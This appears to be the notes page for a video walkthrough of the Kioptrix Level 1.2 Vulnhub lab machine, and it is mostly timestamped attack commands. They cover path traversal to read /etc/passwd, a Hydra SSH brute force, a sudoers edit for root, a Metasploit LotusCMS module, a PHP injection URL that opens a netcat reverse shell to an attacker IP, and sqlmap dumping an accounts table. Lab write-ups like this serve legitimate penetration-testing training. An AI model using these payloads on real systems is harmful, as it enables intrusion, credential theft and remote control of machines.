Kioptrix: Level 1.2 (#3) Walkthrough (Vulnhub | OSCP Model)
Kioptrix (#3) Walkthrough Summary
Twitter: https://twitter.com/AppSecJay
LinkedIn: https://www.linkedin.com/in/jaganboda/
Summary: 00:01
Enumeration: 00:25 Min
Useful commands:
netdiscover -r 192.168.0.0/24
nmap -A -v 192.168.48.160
nikto -h http://192.168.48.160
Gaining Access (Exploitation):
Method 2 Exploitation: 4:00 Min
Useful commands:
http://192.168.48.160/index.php?system=../../../../../etc/passwd%00.
hydra -e nsr -l loneferret -P /root/Documents/rockyou.txt 192.168.48.160 ssh -t 4
Privilege Escalation: 05:42 Min
Useful Commands:
export TERM=xterm
Note: if you’re not sure how to navigate HT, hold the Alt key and use the highlighted letters / numbers on-screen; e.g. Alt + F opens the File menu
sudo ht /etc/sudoers
Then I added /bin/bash to loneferret’s entry
sudo bash
Method 1 Exploitation (Metasploit): 7:57 Min
http://www.exploit-db.com/exploits/15964/
Metasploit:
use exploit/multi/http/lcms_php_exec
Privilege Escalation: 12:51 Min
+
(Manual Exploitation): 13:41 Min
http://kioptrix3.com/index.php?page=index%27);${system(%27nc%20-e%20/bin/sh%20192.168.48.162%206666%27)};%23py
nc -lvp 6666
echo "import pty; pty.spawn('/bin/bash')" > /tmp/jb.py
Method 3 Exploitation:
Exploitation: 15:11 Min
https://www.exploit-db.com/exploits/15891/
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos" --dbms=MySQL
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos" --dbms=MySQL -D gallery --tables
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos" --dbms=MySQL -D gallery -T dev_accounts --dump
Privilege Escalation: 17:46 Min
Summary: 19:29 Min
